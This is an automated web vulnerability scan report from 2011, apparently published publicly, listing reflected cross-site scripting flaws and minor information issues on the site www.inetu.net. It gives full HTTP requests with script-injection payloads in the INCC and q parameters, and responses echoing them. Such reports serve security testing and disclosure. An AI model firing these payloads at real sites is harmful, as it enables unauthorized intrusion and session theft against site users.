XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, unetu.net

DORK | Search Query q=xss

Report generated by XSS.CX at Sat Sep 03 19:59:09 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

XSS in inetu.net, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.inetu.net/managed-cloud/ [INCC parameter]

1.2. http://www.inetu.net/search.php [q parameter]

1.3. http://www.inetu.net/search.php [q parameter]

1.4. http://www.inetu.net/search.php [q parameter]

2. Cross-domain Referer leakage

2.1. http://www.inetu.net/managed-cloud/

2.2. http://www.inetu.net/search.php

3. Cross-domain script include

3.1. http://www.inetu.net/managed-cloud/

3.2. http://www.inetu.net/search.php

4. Email addresses disclosed

4.1. http://www.inetu.net/managed-cloud/

4.2. http://www.inetu.net/search.php

5. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.inetu.net/managed-cloud/ [INCC parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /managed-cloud/

Issue detail

The value of the INCC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bad1"><script>alert(1)</script>ae24a77e48f was submitted in the INCC parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /managed-cloud/?INCC=1bad1"><script>alert(1)</script>ae24a77e48f&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=vps+cloud+hosting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:38:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16406


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>INetU's Managed Cloud Hosting, Private Cloud, and Hybrid Cloud</title>
       <meta http-
...[SNIP]...
<iframe name="ifr" id="ifr" src="http://resources.inetu.net/l/3682/2010-11-11/4T50X?campcode=1bad1"><script>alert(1)</script>ae24a77e48f.&amp;form_submitted=Managed_Cloud_Inquiry" width="100%" type="text/html" height="530" frameborder="0" style="border: 0">
...[SNIP]...

1.2. http://www.inetu.net/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /search.php

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 7ee0f<script>alert(1)</script>637456ab67 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?q=xss7ee0f<script>alert(1)</script>637456ab67&x=0&y=0 HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.inetu.net/managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2d973d3d0dda8665ed3d4b6e4ab9922; ReferedBy=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvps%2Bcloud%2Bhosting; INCC=Adwords; __utma=19393376.1502095189.1315100369.1315100369.1315100369.1; __utmb=19393376.1.10.1315100369; __utmc=19393376; __utmz=19393376.1315100369.1.1.utmgclid=CLO_5L66gqsCFR5UgwodFUqg0Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=vps%20cloud%20hosting; visitor_id3682=160859567

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:43:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14213


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Search Results for 'xss7ee0f<script>alert(1)</script>637456ab67'</title>
       <meta htt
...[SNIP]...
<h1>Search Results for 'xss7ee0f<script>alert(1)</script>637456ab67'</h1>
...[SNIP]...

1.3. http://www.inetu.net/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /search.php

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload 3b6a1</title><script>alert(1)</script>9dc929aa5a6 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?q=xss3b6a1</title><script>alert(1)</script>9dc929aa5a6&x=0&y=0 HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.inetu.net/managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2d973d3d0dda8665ed3d4b6e4ab9922; ReferedBy=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvps%2Bcloud%2Bhosting; INCC=Adwords; __utma=19393376.1502095189.1315100369.1315100369.1315100369.1; __utmb=19393376.1.10.1315100369; __utmc=19393376; __utmz=19393376.1315100369.1.1.utmgclid=CLO_5L66gqsCFR5UgwodFUqg0Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=vps%20cloud%20hosting; visitor_id3682=160859567

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:43:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14246


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Search Results for 'xss3b6a1</title><script>alert(1)</script>9dc929aa5a6'</title>
       
...[SNIP]...

1.4. http://www.inetu.net/search.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /search.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 729d4"><script>alert(1)</script>60cc433b47c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?q=xss729d4"><script>alert(1)</script>60cc433b47c&x=0&y=0 HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.inetu.net/managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2d973d3d0dda8665ed3d4b6e4ab9922; ReferedBy=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvps%2Bcloud%2Bhosting; INCC=Adwords; __utma=19393376.1502095189.1315100369.1315100369.1315100369.1; __utmb=19393376.1.10.1315100369; __utmc=19393376; __utmz=19393376.1315100369.1.1.utmgclid=CLO_5L66gqsCFR5UgwodFUqg0Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=vps%20cloud%20hosting; visitor_id3682=160859567

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:43:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14238


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Search Results for 'xss729d4"><script>alert(1)</script>60cc433b47c'</title>
       <meta
...[SNIP]...
<meta name="title" content="Search Results for 'xss729d4"><script>alert(1)</script>60cc433b47c'">
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://www.inetu.net/managed-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /managed-cloud/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=vps+cloud+hosting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:38:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16370


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>INetU's Managed Cloud Hosting, Private Cloud, and Hybrid Cloud</title>
       <meta http-
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
<p>
<img alt="Demandbase Connect" width="1" height="1"
src="http://leads.demandbase.com/66456515ns.gif" />

</p>
...[SNIP]...
<p><a href="http://www.demandbase.com">
<img src="http://www.demandbase.com/images/stream/demandbase.gif"
alt="Demandbase" width="1" height="1">
</a>
...[SNIP]...

2.2. http://www.inetu.net/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /search.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search.php?q=xss&x=0&y=0 HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.inetu.net/managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2d973d3d0dda8665ed3d4b6e4ab9922; ReferedBy=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvps%2Bcloud%2Bhosting; INCC=Adwords; __utma=19393376.1502095189.1315100369.1315100369.1315100369.1; __utmb=19393376.1.10.1315100369; __utmc=19393376; __utmz=19393376.1315100369.1.1.utmgclid=CLO_5L66gqsCFR5UgwodFUqg0Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=vps%20cloud%20hosting; visitor_id3682=160859567

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:43:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Search Results for 'xss'</title>
       <meta http-equiv="content-type" content="text/htm
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
<p>
<img alt="Demandbase Connect" width="1" height="1"
src="http://leads.demandbase.com/66456515ns.gif" />

</p>
...[SNIP]...
<p><a href="http://www.demandbase.com">
<img src="http://www.demandbase.com/images/stream/demandbase.gif"
alt="Demandbase" width="1" height="1">
</a>
...[SNIP]...

3. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://www.inetu.net/managed-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /managed-cloud/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=vps+cloud+hosting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:38:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16370


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>INetU's Managed Cloud Hosting, Private Cloud, and Hybrid Cloud</title>
       <meta http-
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

3.2. http://www.inetu.net/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /search.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.php?q=xss&x=0&y=0 HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.inetu.net/managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2d973d3d0dda8665ed3d4b6e4ab9922; ReferedBy=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvps%2Bcloud%2Bhosting; INCC=Adwords; __utma=19393376.1502095189.1315100369.1315100369.1315100369.1; __utmb=19393376.1.10.1315100369; __utmc=19393376; __utmz=19393376.1315100369.1.1.utmgclid=CLO_5L66gqsCFR5UgwodFUqg0Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=vps%20cloud%20hosting; visitor_id3682=160859567

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:43:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Search Results for 'xss'</title>
       <meta http-equiv="content-type" content="text/htm
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

4. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. http://www.inetu.net/managed-cloud/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /managed-cloud/

Issue detail

The following email address was disclosed in the response:

Request

GET /managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=vps+cloud+hosting
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:38:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16370


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>INetU's Managed Cloud Hosting, Private Cloud, and Hybrid Cloud</title>
       <meta http-
...[SNIP]...
<a href="mailto:info@inetu.net?subject=Website%20Inquiry">
...[SNIP]...

4.2. http://www.inetu.net/search.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /search.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /search.php?q=xss&x=0&y=0 HTTP/1.1
Host: www.inetu.net
Proxy-Connection: keep-alive
Referer: http://www.inetu.net/managed-cloud/?INCC=Adwords&pi_ad_id=7720110723&gclid=CLO_5L66gqsCFR5UgwodFUqg0Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b2d973d3d0dda8665ed3d4b6e4ab9922; ReferedBy=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dvps%2Bcloud%2Bhosting; INCC=Adwords; __utma=19393376.1502095189.1315100369.1315100369.1315100369.1; __utmb=19393376.1.10.1315100369; __utmc=19393376; __utmz=19393376.1315100369.1.1.utmgclid=CLO_5L66gqsCFR5UgwodFUqg0Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=vps%20cloud%20hosting; visitor_id3682=160859567

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:43:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14396


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <title>Search Results for 'xss'</title>
       <meta http-equiv="content-type" content="text/htm
...[SNIP]...
<a href="mailto:info@inetu.net?subject=Website%20Inquiry">
...[SNIP]...
<a name="email_info" href="mailto:info@inetu.net?subject=Web Site Response">info@inetu.net</a>
...[SNIP]...
<a name="email_sales" href="mailto:sales@inetu.net?subject=Web Site Response">sales@inetu.net</a>
...[SNIP]...
<a name="email_billing" href="mailto:billing@inetu.net?subject=Web Site Response">billing@inetu.net</a>
...[SNIP]...
<a name="email_jobs" href="mailto:jobs@inetu.net?subject=Web Site Response">jobs@inetu.net</a>
...[SNIP]...

5. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inetu.net
Path:   /managed-cloud/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.inetu.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:38:49 GMT
Server: Apache
Last-Modified: Tue, 24 Nov 2009 15:41:28 GMT
ETag: "a13ea-17-c67efa00"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

Report generated by XSS.CX at Sat Sep 03 19:59:09 GMT-06:00 2011.